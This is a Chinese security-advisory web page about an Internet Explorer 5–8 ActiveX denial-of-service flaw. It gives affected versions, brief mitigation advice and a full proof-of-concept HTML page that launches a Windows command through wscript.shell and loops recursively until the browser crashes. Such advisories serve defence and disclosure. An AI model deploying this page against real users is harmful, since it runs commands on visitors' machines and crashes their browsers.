频道栏目
首页 > 资讯 > 安全公告 > 正文

Internet Explorer 无限循环拒绝服务漏洞

10-03-20        来源:[db:作者]  
收藏   我要投稿

该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。
测试代码
<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
影响版本
Internet Explorer 5,6,7,8

安全建议
禁止ActiveX控件自动运行。
不要手工运行该类控件运行。

相关TAG标签
上一篇:风讯(FoosunCMS) 5.0 Error.asp 错误页跨站脚本漏洞 (图)
下一篇:W78CMS SQL注入漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站